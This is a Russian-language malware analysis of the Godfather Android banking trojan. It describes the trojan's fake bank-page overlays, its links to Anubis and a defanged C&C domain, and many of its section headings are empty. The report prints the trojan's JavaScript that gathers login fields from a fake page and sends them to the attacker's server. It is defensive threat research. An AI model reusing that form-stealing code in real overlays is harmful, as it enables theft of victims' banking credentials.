Визитной карточкой любого Android-банкера являются webfake’и (отображаемые поверх легитимных приложений html-страницы), и у Godfather’а мы обнаружили их в избытке. Godfather может отобразить webfake в случае, когда пользователь кликнет на уведомление обманку или запустит легитимное приложение, которое содержится в целях трояна. Все введенные в эти страницы данные (такие как имя пользователя и пароль) будут отправлены на сервер, контролируемый злоумышленниками.
Примеры webfake-страниц мобильных приложений турецких банков и электронных кошельков.
Что еще умеет Godfather?
Незабытое старое: Anubis, мы тебя узнали
Сравнение троянов Godfather и Anubis
Домен pluscurrencyconverter[.]com - С&C адрес Downloader. Также ниже представлена схема DNS replications С&C адресов Godfather.
Должностные обязанности Дона
Анимация "активности" Google Protect
Технические детали
Эксфильтрация данных
AccessibilityService
Proxy-модуль
VNC-модуль
ScreenCapture модуль
WebSocket модуль
Модуль отображения Webfake-ов
function submit_data(form) {
var json = {};
for( var i = 0 ; i < form.length ; i++ )
{
var input = form[i];
if ( input.type == "submit" )
continue;
json[ form[i].name ] = form[i].value;
}
logs = ""
$.each(json, function(i, v) {
logs = logs + "" + i + ":" + v + "//br//";
});
top['closeDlg'] = true;
var url = '%C2%';
var imei_c = '%KEY%|%LOCALE%';
location.replace(url + '/sender_new.php?p=' + imei_c + "|Injection_10|%PACKAGE_NAME%|" + logs+'|918')
}
Заключение: рекомендации по защите